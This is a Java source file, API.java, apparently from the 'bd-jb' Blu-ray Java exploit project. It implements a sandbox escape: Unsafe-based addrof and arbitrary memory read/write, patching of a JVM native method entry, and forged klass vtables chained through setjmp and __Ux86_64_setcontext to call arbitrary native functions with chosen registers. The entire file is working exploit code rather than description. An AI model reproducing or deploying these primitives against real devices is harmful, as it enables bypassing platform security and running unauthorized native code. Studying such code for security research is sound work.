bd-jb/com/bdjb/API.java

583 lines
17 KiB
Java

/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
/** API class to access native data and execute native code. */
public final class API {
public static final int INT8_SIZE = 1;
public static final int INT16_SIZE = 2;
public static final int INT32_SIZE = 4;
public static final int INT64_SIZE = 8;
public static final int RTLD_DEFAULT = -2;
public static final int LIBC_MODULE_HANDLE = 0x2;
public static final int LIBKERNEL_MODULE_HANDLE = 0x2001;
public static final int LIBJAVA_MODULE_HANDLE = 0x4A;
private static final String UNSUPPORTED_DLOPEN_OPERATION_STRING =
"Unsupported dlopen() operation";
private static final String JAVA_JAVA_LANG_REFLECT_ARRAY_MULTI_NEW_ARRAY_SYMBOL =
"Java_java_lang_reflect_Array_multiNewArray";
private static final String JVM_NATIVE_PATH_SYMBOL = "JVM_NativePath";
private static final String SETJMP_SYMBOL = "setjmp";
private static final String UX86_64_SETCONTEXT_SYMBOL = "__Ux86_64_setcontext";
private static final String ERROR_SYMBOL = "__error";
private static final String MULTI_NEW_ARRAY_METHOD_NAME = "multiNewArray";
private static final String MULTI_NEW_ARRAY_METHOD_SIGNATURE = "(J[I)J";
private static final String NATIVE_LIBRARY_CLASS_NAME = "java.lang.ClassLoader$NativeLibrary";
private static final String FIND_METHOD_NAME = "find";
private static final String FIND_ENTRY_METHOD_NAME = "findEntry";
private static final String HANDLE_FIELD_NAME = "handle";
private static final String VALUE_FIELD_NAME = "value";
private static final int[] MULTI_NEW_ARRAY_DIMENSIONS = new int[] {1};
private static API instance;
private UnsafeInterface unsafe;
private long longValueOffset;
private Object nativeLibrary;
private Method findMethod;
private Field handleField;
private long executableHandle;
private long Java_java_lang_reflect_Array_multiNewArray;
private long JVM_NativePath;
private long setjmp;
private long __Ux86_64_setcontext;
private long __error;
private boolean jdk11;
private API() throws Exception {
this.init();
}
public static synchronized API getInstance() throws Exception {
if (instance == null) {
instance = new API();
}
return instance;
}
private native long multiNewArray(long componentType, int[] dimensions);
private void init() throws Exception {
initUnsafe();
initDlsym();
initSymbols();
initApiCall();
}
private void initUnsafe() throws Exception {
try {
unsafe = new UnsafeSunImpl();
jdk11 = false;
} catch (ClassNotFoundException e) {
unsafe = new UnsafeJdkImpl();
jdk11 = true;
}
longValueOffset = unsafe.objectFieldOffset(Long.class.getDeclaredField(VALUE_FIELD_NAME));
}
private void initDlsym() throws Exception {
Class nativeLibraryClass = Class.forName(NATIVE_LIBRARY_CLASS_NAME);
if (jdk11) {
findMethod =
nativeLibraryClass.getDeclaredMethod(FIND_ENTRY_METHOD_NAME, new Class[] {String.class});
} else {
findMethod =
nativeLibraryClass.getDeclaredMethod(FIND_METHOD_NAME, new Class[] {String.class});
}
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
findMethod.setAccessible(true);
handleField.setAccessible(true);
Constructor nativeLibraryConstructor =
nativeLibraryClass.getDeclaredConstructor(
new Class[] {Class.class, String.class, boolean.class});
nativeLibraryConstructor.setAccessible(true);
nativeLibrary =
nativeLibraryConstructor.newInstance(new Object[] {getClass(), "api", new Boolean(true)});
}
private void initSymbols() {
JVM_NativePath = dlsym(RTLD_DEFAULT, JVM_NATIVE_PATH_SYMBOL);
if (JVM_NativePath == 0) {
throw new IllegalStateException("Could not find JVM_NativePath.");
}
__Ux86_64_setcontext = dlsym(LIBKERNEL_MODULE_HANDLE, UX86_64_SETCONTEXT_SYMBOL);
if (__Ux86_64_setcontext == 0) {
// In earlier versions, there's a bug where only the main executable's handle is used.
executableHandle = JVM_NativePath & ~(4 - 1);
while (strcmp(executableHandle, UNSUPPORTED_DLOPEN_OPERATION_STRING) != 0) {
executableHandle += 4;
}
executableHandle -= 4;
// Try again.
__Ux86_64_setcontext = dlsym(LIBKERNEL_MODULE_HANDLE, UX86_64_SETCONTEXT_SYMBOL);
}
if (__Ux86_64_setcontext == 0) {
throw new IllegalStateException("Could not find __Ux86_64_setcontext.");
}
if (jdk11) {
Java_java_lang_reflect_Array_multiNewArray =
dlsym(LIBJAVA_MODULE_HANDLE, JAVA_JAVA_LANG_REFLECT_ARRAY_MULTI_NEW_ARRAY_SYMBOL);
} else {
Java_java_lang_reflect_Array_multiNewArray =
dlsym(RTLD_DEFAULT, JAVA_JAVA_LANG_REFLECT_ARRAY_MULTI_NEW_ARRAY_SYMBOL);
}
if (Java_java_lang_reflect_Array_multiNewArray == 0) {
throw new IllegalStateException("Could not find Java_java_lang_reflect_Array_multiNewArray.");
}
setjmp = dlsym(LIBC_MODULE_HANDLE, SETJMP_SYMBOL);
if (setjmp == 0) {
throw new IllegalStateException("Could not find setjmp.");
}
__error = dlsym(LIBKERNEL_MODULE_HANDLE, ERROR_SYMBOL);
if (__error == 0) {
throw new IllegalStateException("Could not find __error.");
}
}
private void initApiCall() {
long apiInstance = addrof(this);
long apiKlass = read64(apiInstance + 0x08);
if (jdk11) {
long methods = read64(apiKlass + 0x170);
int numMethods = read32(methods + 0x00);
for (int i = 0; i < numMethods; i++) {
long method = read64(methods + 0x08 + i * 8);
long constMethod = read64(method + 0x08);
long constants = read64(constMethod + 0x08);
short nameIndex = read16(constMethod + 0x2A);
short signatureIndex = read16(constMethod + 0x2C);
long nameSymbol = read64(constants + 0x40 + nameIndex * 8) & ~(2 - 1);
long signatureSymbol = read64(constants + 0x40 + signatureIndex * 8) & ~(2 - 1);
short nameLength = read16(nameSymbol + 0x00);
short signatureLength = read16(signatureSymbol + 0x00);
String name = readString(nameSymbol + 0x06, nameLength);
String signature = readString(signatureSymbol + 0x06, signatureLength);
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
return;
}
}
} else {
long methods = read64(apiKlass + 0xC8);
int numMethods = read32(methods + 0x10);
for (int i = 0; i < numMethods; i++) {
long method = read64(methods + 0x18 + i * 8);
long constMethod = read64(method + 0x10);
long constants = read64(method + 0x18);
short nameIndex = read16(constMethod + 0x42);
short signatureIndex = read16(constMethod + 0x44);
long nameSymbol = read64(constants + 0x40 + nameIndex * 8) & ~(2 - 1);
long signatureSymbol = read64(constants + 0x40 + signatureIndex * 8) & ~(2 - 1);
short nameLength = read16(nameSymbol + 0x08);
short signatureLength = read16(signatureSymbol + 0x08);
String name = readString(nameSymbol + 0x0A, nameLength);
String signature = readString(signatureSymbol + 0x0A, signatureLength);
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
return;
}
}
}
throw new IllegalStateException("Could not install native method.");
}
private void buildContext(
long contextBuf,
long jmpBuf,
long rip,
long rdi,
long rsi,
long rdx,
long rcx,
long r8,
long r9) {
long rbx = read64(jmpBuf + 0x08);
long rsp = read64(jmpBuf + 0x10);
long rbp = read64(jmpBuf + 0x18);
long r12 = read64(jmpBuf + 0x20);
long r13 = read64(jmpBuf + 0x28);
long r14 = read64(jmpBuf + 0x30);
long r15 = read64(jmpBuf + 0x38);
write64(contextBuf + 0x48, rdi);
write64(contextBuf + 0x50, rsi);
write64(contextBuf + 0x58, rdx);
write64(contextBuf + 0x60, rcx);
write64(contextBuf + 0x68, r8);
write64(contextBuf + 0x70, r9);
write64(contextBuf + 0x80, rbx);
write64(contextBuf + 0x88, rbp);
write64(contextBuf + 0xA0, r12);
write64(contextBuf + 0xA8, r13);
write64(contextBuf + 0xB0, r14);
write64(contextBuf + 0xB8, r15);
write64(contextBuf + 0xE0, rip);
write64(contextBuf + 0xF8, rsp);
write64(contextBuf + 0x110, 0);
write64(contextBuf + 0x118, 0);
}
public void train() {
for (int i = 0; i < 10000; i++) {
call(0);
}
}
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
long fakeClassOop = malloc(INT64_SIZE);
long fakeClass = malloc(0x100);
long fakeKlass = malloc(0x200);
long fakeKlassVtable = malloc(0x400);
if (fakeClassOop == 0 || fakeClass == 0 || fakeKlass == 0 || fakeKlassVtable == 0) {
throw new IllegalStateException("Could not allocate memory.");
}
write64(fakeClassOop, 0);
memset(fakeClass, 0, 0x100);
memset(fakeKlass, 0, 0x200);
memset(fakeKlassVtable, 0, 0x400);
try {
long ret = 0;
// When func is 0, only do one iteration to avoid calling __Ux86_64_setcontext.
// This is used to "train" this function to kick in optimization early. Otherwise, it is
// possible that optimization kicks in between the calls to setjmp and __Ux86_64_setcontext
// leading to different stack layouts of the two calls.
int iter = func == 0 ? 1 : 2;
if (jdk11) {
write64(fakeClassOop + 0x00, fakeClass);
write64(fakeClass + 0x98, fakeKlass);
write32(fakeKlass + 0xC4, 0); // dimension
write64(fakeKlassVtable + 0xD8, JVM_NativePath); // array_klass
for (int i = 0; i < iter; i++) {
write64(fakeKlass + 0x00, fakeKlassVtable);
write64(fakeKlass + 0x00, fakeKlassVtable);
if (i == 0) {
write64(fakeKlassVtable + 0x158, setjmp); // multi_allocate
} else {
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
}
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
buildContext(
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
}
} else {
write64(fakeClassOop + 0x00, fakeClass);
write64(fakeClass + 0x68, fakeKlass);
write32(fakeKlass + 0xBC, 0); // dimension
write64(fakeKlassVtable + 0x80, JVM_NativePath); // array_klass
write64(fakeKlassVtable + 0xF0, JVM_NativePath); // oop_is_array
for (int i = 0; i < iter; i++) {
write64(fakeKlass + 0x10, fakeKlassVtable);
write64(fakeKlass + 0x20, fakeKlassVtable);
if (i == 0) {
write64(fakeKlassVtable + 0x230, setjmp); // multi_allocate
} else {
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
}
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
buildContext(
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
}
}
if (ret == 0) {
return 0;
}
return read64(ret);
} finally {
free(fakeKlassVtable);
free(fakeKlass);
free(fakeClass);
free(fakeClassOop);
}
}
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4) {
return call(func, arg0, arg1, arg2, arg3, arg4, (long) 0);
}
public long call(long func, long arg0, long arg1, long arg2, long arg3) {
return call(func, arg0, arg1, arg2, arg3, (long) 0);
}
public long call(long func, long arg0, long arg1, long arg2) {
return call(func, arg0, arg1, arg2, (long) 0);
}
public long call(long func, long arg0, long arg1) {
return call(func, arg0, arg1, (long) 0);
}
public long call(long func, long arg0) {
return call(func, arg0, (long) 0);
}
public long call(long func) {
return call(func, (long) 0);
}
public int errno() {
return read32(call(__error));
}
public long dlsym(long handle, String symbol) {
int oldHandle = RTLD_DEFAULT;
try {
if (executableHandle != 0) {
// In earlier versions, there's a bug where only the main executable's handle is used.
oldHandle = read32(executableHandle);
write32(executableHandle, (int) handle);
handleField.setLong(nativeLibrary, RTLD_DEFAULT);
} else {
handleField.setLong(nativeLibrary, handle);
}
return ((Long) findMethod.invoke(nativeLibrary, new Object[] {symbol})).longValue();
} catch (IllegalAccessException e) {
return 0;
} catch (InvocationTargetException e) {
return 0;
} finally {
if (executableHandle != 0) {
write32(executableHandle, oldHandle);
}
}
}
public long addrof(Object obj) {
Long val = new Long(1337);
unsafe.putObject(val, longValueOffset, obj);
return unsafe.getLong(val, longValueOffset);
}
public byte read8(long addr) {
return unsafe.getByte(addr);
}
public short read16(long addr) {
return unsafe.getShort(addr);
}
public int read32(long addr) {
return unsafe.getInt(addr);
}
public long read64(long addr) {
return unsafe.getLong(addr);
}
public void write8(long addr, byte val) {
unsafe.putByte(addr, val);
}
public void write16(long addr, short val) {
unsafe.putShort(addr, val);
}
public void write32(long addr, int val) {
unsafe.putInt(addr, val);
}
public void write64(long addr, long val) {
unsafe.putLong(addr, val);
}
public long malloc(long size) {
return unsafe.allocateMemory(size);
}
public long realloc(long ptr, long size) {
return unsafe.reallocateMemory(ptr, size);
}
public void free(long ptr) {
unsafe.freeMemory(ptr);
}
public long memcpy(long dest, long src, long n) {
unsafe.copyMemory(src, dest, n);
return dest;
}
public long memcpy(long dest, byte[] src, long n) {
for (int i = 0; i < n; i++) {
write8(dest + i, src[i]);
}
return dest;
}
public byte[] memcpy(byte[] dest, long src, long n) {
for (int i = 0; i < n; i++) {
dest[i] = read8(src + i);
}
return dest;
}
public long memset(long s, int c, long n) {
unsafe.setMemory(s, n, (byte) c);
return s;
}
public byte[] memset(byte[] s, int c, long n) {
for (int i = 0; i < n; i++) {
s[i] = (byte) c;
}
return s;
}
public int memcmp(long s1, long s2, long n) {
for (int i = 0; i < n; i++) {
byte b1 = read8(s1 + i);
byte b2 = read8(s2 + i);
if (b1 != b2) {
return (int) b1 - (int) b2;
}
}
return 0;
}
public int memcmp(long s1, byte[] s2, long n) {
for (int i = 0; i < n; i++) {
byte b1 = read8(s1 + i);
byte b2 = s2[i];
if (b1 != b2) {
return (int) b1 - (int) b2;
}
}
return 0;
}
public int memcmp(byte[] s1, long s2, long n) {
return memcmp(s2, s1, n);
}
public int strcmp(long s1, long s2) {
for (int i = 0; ; i++) {
byte b1 = read8(s1 + i);
byte b2 = read8(s2 + i);
if (b1 != b2) {
return (int) b1 - (int) b2;
}
if (b1 == (byte) 0 && b2 == (byte) 0) {
return 0;
}
}
}
public int strcmp(long s1, String s2) {
byte[] bytes = toCBytes(s2);
for (int i = 0; ; i++) {
byte b1 = read8(s1 + i);
byte b2 = bytes[i];
if (b1 != b2) {
return (int) b1 - (int) b2;
}
if (b1 == (byte) 0 && b2 == (byte) 0) {
return 0;
}
}
}
public int strcmp(String s1, long s2) {
return strcmp(s2, s1);
}
public long strcpy(long dest, long src) {
for (int i = 0; ; i++) {
byte ch = read8(src + i);
write8(dest + i, ch);
if (ch == (byte) 0) {
break;
}
}
return dest;
}
public long strcpy(long dest, String src) {
byte[] bytes = toCBytes(src);
for (int i = 0; ; i++) {
byte ch = bytes[i];
write8(dest + i, ch);
if (ch == (byte) 0) {
break;
}
}
return dest;
}
public String readString(long src, long n) {
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
for (int i = 0; ; i++) {
byte ch = read8(src + i);
if (ch == (byte) 0 || i == n) {
break;
}
outputStream.write(new byte[] {ch}, 0, 1);
}
return outputStream.toString();
}
public String readString(long src) {
return readString(src, -1);
}
public byte[] toCBytes(String str) {
byte[] bytes = new byte[str.length() + 1];
System.arraycopy(str.getBytes(), 0, bytes, 0, str.length());
return bytes;
}
}